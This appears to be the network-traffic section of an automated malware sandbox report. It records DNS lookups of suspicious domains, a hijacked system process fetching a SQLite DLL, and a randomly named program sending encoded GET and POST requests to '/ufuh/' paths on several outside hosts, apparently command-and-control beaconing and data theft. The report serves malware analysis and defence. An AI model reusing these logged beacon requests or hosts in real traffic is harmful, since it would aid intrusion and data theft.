                                                                                        May 14, 2024 09:37:51.878917933 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:51.879014969 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:51.879180908 CEST4917280192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:52.188564062 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.188970089 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.188987017 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.188998938 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.189013004 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.189023972 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.189039946 CEST8049172194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:52.189054012 CEST4917280192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:52.189054012 CEST4917280192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:52.189097881 CEST4917280192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:53.072379112 CEST4917280192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.086519957 CEST4917380192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.389030933 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.389103889 CEST4917380192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.389324903 CEST4917380192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.694407940 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694504976 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694516897 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694530010 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694540977 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694547892 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694555998 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:54.694660902 CEST4917380192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.694884062 CEST4917380192.168.2.22194.9.94.86
                                                                                        May 14, 2024 09:37:54.997138977 CEST8049173194.9.94.86192.168.2.22
                                                                                        May 14, 2024 09:37:59.860471010 CEST4917480192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:00.158498049 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.158571959 CEST4917480192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:00.158834934 CEST4917480192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:00.456926107 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.456949949 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.456964016 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.456974983 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.456974030 CEST4917480192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:00.457005978 CEST4917480192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:00.754950047 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:00.754976988 CEST804917491.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:02.697696924 CEST4917580192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:02.995821953 CEST804917591.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:02.995906115 CEST4917580192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:02.996174097 CEST4917580192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:03.294264078 CEST804917591.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:03.294286966 CEST804917591.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:03.294394970 CEST4917580192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:04.507077932 CEST4917580192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:05.523380041 CEST4917680192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:05.823997021 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:05.824547052 CEST4917680192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:05.824547052 CEST4917680192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:06.126065969 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.126132965 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.126141071 CEST4917680192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:06.126147985 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.126166105 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.126200914 CEST4917680192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:06.428005934 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.428024054 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:06.428036928 CEST804917691.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:13.215214014 CEST4917780192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:13.513068914 CEST804917791.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:13.513159990 CEST4917780192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:13.513349056 CEST4917780192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:13.811152935 CEST804917791.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:13.811176062 CEST804917791.195.240.19192.168.2.22
                                                                                        May 14, 2024 09:38:13.811358929 CEST4917780192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:13.811433077 CEST4917780192.168.2.2291.195.240.19
                                                                                        May 14, 2024 09:38:14.109232903 CEST804917791.195.240.19192.168.2.22

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        May 14, 2024 09:36:01.970992088 CEST138138192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:36:06.363961935 CEST5456253192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:36:06.519129038 CEST53545628.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:36:43.081450939 CEST5291753192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:36:43.236757994 CEST53529178.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:36:48.240175009 CEST6275153192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:36:48.418061972 CEST53627518.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:36:54.376379013 CEST5789353192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:36:54.529026031 CEST53578938.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:01.227762938 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:01.982273102 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:02.746696949 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:08.992518902 CEST5482153192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:09.148708105 CEST53548218.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:09.149564981 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:09.907167912 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:10.671443939 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:12.452090979 CEST5471953192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:12.610157967 CEST53547198.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:12.611201048 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:13.370234013 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:14.134634018 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:15.914514065 CEST4988153192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:16.074285030 CEST53498818.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:16.074958086 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:16.833415985 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:17.597940922 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:19.378012896 CEST5499853192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:19.532195091 CEST53549988.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:19.536854029 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:20.296673059 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:21.061115980 CEST137137192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:37:26.839903116 CEST5278153192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:27.169945002 CEST53527818.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:45.280180931 CEST6392653192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:45.589466095 CEST53639268.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:37:59.703797102 CEST6551053192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:37:59.859941006 CEST53655108.8.8.8192.168.2.22
                                                                                        May 14, 2024 09:38:01.669194937 CEST138138192.168.2.22192.168.2.255
                                                                                        May 14, 2024 09:38:18.815047979 CEST6267253192.168.2.228.8.8.8
                                                                                        May 14, 2024 09:38:18.967835903 CEST53626728.8.8.8192.168.2.22

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        May 14, 2024 09:36:06.363961935 CEST192.168.2.228.8.8.80x839dStandard query (0)covid19help.topA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:43.081450939 CEST192.168.2.228.8.8.80xfaf5Standard query (0)www.besthomeincome24.comA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:48.240175009 CEST192.168.2.228.8.8.80x7bfaStandard query (0)www.terelprime.comA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:54.376379013 CEST192.168.2.228.8.8.80xf82cStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:08.992518902 CEST192.168.2.228.8.8.80x3e02Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:12.452090979 CEST192.168.2.228.8.8.80x3dStandard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:15.914514065 CEST192.168.2.228.8.8.80x1410Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:19.378012896 CEST192.168.2.228.8.8.80xdc07Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:26.839903116 CEST192.168.2.228.8.8.80x5684Standard query (0)www.kinkynerdspro.blogA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:45.280180931 CEST192.168.2.228.8.8.80xa9b5Standard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:59.703797102 CEST192.168.2.228.8.8.80x428bStandard query (0)www.primeplay88.orgA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:38:18.815047979 CEST192.168.2.228.8.8.80xf280Standard query (0)www.aceautocorp.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        May 14, 2024 09:36:06.519129038 CEST8.8.8.8192.168.2.220x839dNo error (0)covid19help.top172.67.175.222A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:06.519129038 CEST8.8.8.8192.168.2.220x839dNo error (0)covid19help.top104.21.83.128A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:43.236757994 CEST8.8.8.8192.168.2.220xfaf5Name error (3)www.besthomeincome24.comnonenoneA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:48.418061972 CEST8.8.8.8192.168.2.220x7bfaNo error (0)www.terelprime.com66.96.161.166A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:36:54.529026031 CEST8.8.8.8192.168.2.220xf82cNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:09.148708105 CEST8.8.8.8192.168.2.220x3e02Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:12.610157967 CEST8.8.8.8192.168.2.220x3dName error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:16.074285030 CEST8.8.8.8192.168.2.220x1410Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:19.532195091 CEST8.8.8.8192.168.2.220xdc07Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:27.169945002 CEST8.8.8.8192.168.2.220x5684No error (0)www.kinkynerdspro.blog54.38.220.85A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:45.589466095 CEST8.8.8.8192.168.2.220xa9b5No error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:45.589466095 CEST8.8.8.8192.168.2.220xa9b5No error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:37:59.859941006 CEST8.8.8.8192.168.2.220x428bNo error (0)www.primeplay88.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                        May 14, 2024 09:37:59.859941006 CEST8.8.8.8192.168.2.220x428bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                        May 14, 2024 09:38:18.967835903 CEST8.8.8.8192.168.2.220xf280No error (0)www.aceautocorp.comaceautocorp.comCNAME (Canonical name)IN (0x0001)false
                                                                                        May 14, 2024 09:38:18.967835903 CEST8.8.8.8192.168.2.220xf280No error (0)aceautocorp.com198.12.241.35A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • covid19help.top
                                                                                        • www.terelprime.com
                                                                                        • www.sqlite.org
                                                                                        • www.kinkynerdspro.blog
                                                                                        • www.xn--matfrmn-jxa4m.se
                                                                                        • www.primeplay88.org

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.224916466.96.161.166802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:36:48.683419943 CEST462OUTGET /ufuh/?f6=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&kjBDU=ZblXcjBhG HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Connection: close
                                                                                        Host: www.terelprime.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        May 14, 2024 09:36:48.924628973 CEST1087INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 14 May 2024 07:36:48 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 867
                                                                                        Connection: close
                                                                                        Server: Apache
                                                                                        Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 0
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.224916545.33.6.223803232C:\Windows\SysWOW64\dfrgui.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:36:58.060298920 CEST248OUTGET /2016/sqlite-dll-win32-x86-3130000.zip HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Host: www.sqlite.org
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        May 14, 2024 09:36:58.246522903 CEST249INHTTP/1.1 200 OK
                                                                                        Connection: keep-alive
                                                                                        Date: Tue, 14 May 2024 07:36:58 GMT
                                                                                        Last-Modified: Thu, 04 Aug 2016 14:08:46 GMT
                                                                                        Cache-Control: max-age=120
                                                                                        ETag: "m57a34c6es69ad9"
                                                                                        Content-type: application/zip; charset=utf-8
                                                                                        Content-length: 432857
                                                                                        May 14, 2024 09:36:58.246550083 CEST1289INData Raw: 50 4b 03 04 14 00 00 00 08 00 24 91 b2 48 89 ab e7 7f b7 04 00 00 3d 13 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 54 4d 3c 57 54 4d 3c 57 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 c9 92 e3 36 0c 40 ef f3 37 33 93
                                                                                        Data Ascii: PK$H=sqlite3.defUTTM<WTM<Wuxd6@739$TbRH6~j$&"LT,)O<iUVKObsUx0W{c.<8[\5pl]xa |)QWJI*t
                                                                                        May 14, 2024 09:36:58.246619940 CEST1289INData Raw: 48 0f d8 17 d6 e0 94 06 00 97 9d 0c 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 6c 6c 55 54 09 00 03 54 4d 3c 57 54 4d 3c 57 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 ec fd 7b 7c 54 d5 b9 38 8c ef 3d b3 93 4c 92 81 3d c0 00 03 44 89 1a 95 08 6a
                                                                                        Data Ascii: Hsqlite3.dllUTTM<WTM<Wuxd{|T8=L=DjF"pVS=ao.CD:jz`\B `=bs<k$~5k=`8D8n?ssNNMilM;[oG
                                                                                        May 14, 2024 09:36:58.246634960 CEST1289INData Raw: b8 63 6c 1c 92 c9 f8 76 bb 51 e4 2f e1 f7 e0 6b b0 16 cb 44 f7 4f 6f 4a 53 5c 86 b1 58 70 1b c3 86 92 e6 d2 15 69 0b e8 92 b4 54 b5 60 8c 8d 19 2c 1a 63 bc 60 95 5b d5 af 42 77 20 af 55 3b fd a2 8f 7c 0c 18 44 79 e0 55 18 60 4e 72 e1 12 f8 15 0c
                                                                                        Data Ascii: clvQ/kDOoJS\XpiT`,c`[Bw U;|DyU`NrbbJi&6f*V"UmR"6x{rki%/!1Y*o,DRB,{%\T;H`kuPBVfy5F4_[Z@
                                                                                        May 14, 2024 09:36:58.246651888 CEST1289INData Raw: e2 0b 38 64 c6 70 39 3b d9 ce 10 ff 78 c6 5c 72 84 ad eb ed 71 83 9d ca 51 c0 24 5d c9 de 76 f9 81 8e cb 8a bf 39 d2 d1 dd 71 f9 4c cb d9 8e f0 ff c1 53 72 8c 97 ef 37 5a 2a fe 00 f1 81 3f 25 3a 60 9b 0a a0 b1 d0 8a 02 6c e7 f2 aa 4e b9 4d fb 1a
                                                                                        Data Ascii: 8dp9;x\rqQ$]v9qLSr7Z*?%:`lNMC+2osepou*:[Hl<u]uq%]Pjs?S_HuUVdGt`\[{F}ydG^F}J<F~q/B
                                                                                        May 14, 2024 09:36:58.246665955 CEST1289INData Raw: 62 0b 0c 38 40 9e 56 35 20 cd a0 1e 2b 19 79 44 75 0f 44 22 40 11 5a e8 3c 2d 0c 03 63 22 ed eb 26 cc 61 b0 e0 73 f5 d5 08 cb 11 47 dd 16 cd e4 0c c1 04 ee 47 99 bd 41 5d 23 7f 50 e3 b6 29 dd b6 6c d8 38 b7 72 7d 91 48 1c ea 04 20 57 b2 41 8f 3a
                                                                                        Data Ascii: b8@V5 +yDuD"@Z<-c"&asGGA]#P)l8r}H WA:~Fo/o_/:`XU?K 0Peg}Qc'#F bp.P__h%hfzc@{(~2cb88-6q?BK>"lk&@;|}6
                                                                                        May 14, 2024 09:36:58.246679068 CEST1289INData Raw: 2b c3 bc f8 b2 1b 7e 4c e2 8f dd 16 65 58 80 b7 c4 40 79 02 27 25 c1 82 87 9c 49 9c 76 e3 40 bd 45 8a 87 57 b3 96 38 50 6f 83 07 13 be 26 99 35 01 fe 9a 02 e5 16 ae 26 df 5a 9d 9f 2c c5 2b 2d a9 f0 1b b8 98 2a c5 07 9e 98 39 a6 09 81 fc 99 3c a3
                                                                                        Data Ascii: +~LeX@y'%Iv@EW8Po&5&Z,+-*9<SS<:=dals+8\rF9K0XI|#\2M@ #uD\w+n?7A?[1O0oj$<3/6
                                                                                        May 14, 2024 09:36:58.246704102 CEST1289INData Raw: bd ae 26 49 5d 47 86 d6 4e 42 77 c1 ec e9 38 d5 cb 81 03 b0 22 b2 b0 ff 3b 3f 66 b0 41 91 c2 15 a5 24 1e 58 c9 52 2a 64 c6 0e 66 9a 6f 05 f2 99 5a 57 96 56 b5 c8 e6 12 ad 96 b1 b4 0c 1a 75 c0 a0 03 17 6e af 26 c7 8e ff 43 9a 15 5c bc 3f 68 ad a6
                                                                                        Data Ascii: &I]GNBw8";?fA$XR*dfoZWVun&C\?h7i,dC:SlaCY#&<u(-:.ZK#o]bR.RJJNVkSS^Hp@9@HdK2E(&*s{P9h#gR%Gc7-
                                                                                        May 14, 2024 09:36:58.246717930 CEST1289INData Raw: d4 ce 1a 82 6e 29 91 ba 1d 59 a6 dd 26 62 62 d2 bf 34 a6 c6 58 43 4e 15 39 3b b3 e6 f8 a7 6f 6a 70 98 73 04 72 d5 43 39 f5 43 94 57 7c 6a ac 6c cc 42 1a 60 c6 96 51 4f 2a b9 aa fe 17 4a 28 3c 0b e0 e9 0d f6 94 09 4f 3f 61 4f d9 f0 f4 22 3e 99 e1
                                                                                        Data Ascii: n)Y&bb4XCN9;ojpsrC9CW|jlB`QO*J(<O?aO">5O?`Ogh7l[Ndq\/pBfglp:/e@I&cXOzR&cP>LbgW_[9>K;&@(mSj`S,>l
                                                                                        May 14, 2024 09:36:58.246731043 CEST1289INData Raw: 39 3b 5d a3 7e 3b 8d 87 3d 43 85 76 35 b9 83 2d 7a ab 47 53 61 2d 6b f1 f0 a7 21 aa 38 ad 6a 93 f9 98 65 40 70 9d 85 9c c2 b5 9d 92 f5 a0 ff 6e 65 67 06 b7 3d 9d e6 e4 07 0b 81 3f ca 87 2a 61 34 50 6b 40 0b 53 70 93 f6 30 7d 37 2d e8 59 aa 34 14
                                                                                        Data Ascii: 9;]~;=Cv5-zGSa-k!8je@pneg=?*a4Pk@Sp0}7-Y4j;^t6qIkc.1yRn)M!n_l~nD!)&mm~|}$Q=Vp6'(_e6KxORoO +O G{*ABA2Xa.
                                                                                        May 14, 2024 09:36:58.432178020 CEST1289INData Raw: 48 fd c5 04 51 05 4a 8b c4 5a f7 32 b1 36 f0 d0 02 94 4f d1 7c 81 7c 0c 07 f7 ca 77 2a 7f a5 6e 84 f3 4e 9a a9 8c 44 de a1 f0 22 25 c3 71 af 33 4c 34 69 5c b6 0c 63 d3 26 ad a7 cb ec 03 75 82 5c 84 9a 41 0b bd 67 20 4f e0 a5 3c ba 39 9f 96 af b8
                                                                                        Data Ascii: HQJZ26O||w*nND"%q3L4i\c&u\Ag O<9e[v,J4AKA-M3k1+hz,X^&Ui>1iUE:HJd82SJfrGKZF![T4~qYewUs


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.224916654.38.220.85802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:27.482276917 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 2159
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.kinkynerdspro.blog
                                                                                        Origin: http://www.kinkynerdspro.blog
                                                                                        Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 41 30 [TRUNCATED]
